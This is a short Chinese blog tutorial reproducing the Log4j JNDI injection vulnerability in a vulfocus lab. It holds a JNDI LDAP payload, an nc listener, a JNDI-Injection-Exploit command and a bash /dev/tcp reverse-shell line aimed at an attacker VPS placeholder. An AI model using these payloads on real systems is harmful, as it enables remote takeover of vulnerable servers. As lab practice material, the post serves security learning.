0
点赞
收藏
分享

微信扫一扫

Log4j复现(vulfocus靶场详细教程)

悬灸人雪洋 2022-04-16 阅读 68

直接在vulfocus起一个靶场环境

burp抓包,看到提示参数是payload

dnslog验证

先来使用dnslog验证一下

${jndi:ldap://“ip”/poc}    这里的ip是dnslog获取到的域名

生成的payload需要url编码,下面可以看到验证成功,说明存在log4j,然后我们反弹shell拿权限

 反弹shell

vps开启监听

nc -lvnp 2333

使用工具:https://github.com/Zard-ethan/JNDI-Injection-Exploit-1.0-SNAPSHOT-all启一个ldap服务:

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,反弹shell的base64 编码}|{base64,-d}|{bash,-i}" -A "vps的ip"

反弹shell的命令:bash -i >&/dev/tcp/vps的ip/监听的端口 0>&1     #把这个反弹shell的命令进行base64编码,然后放到第一行的命令当中就可以了

然后去构造payload,进行url编码

 使用burpsuit发送请求,看到成功反弹

 

 

 

举报

相关推荐

0 条评论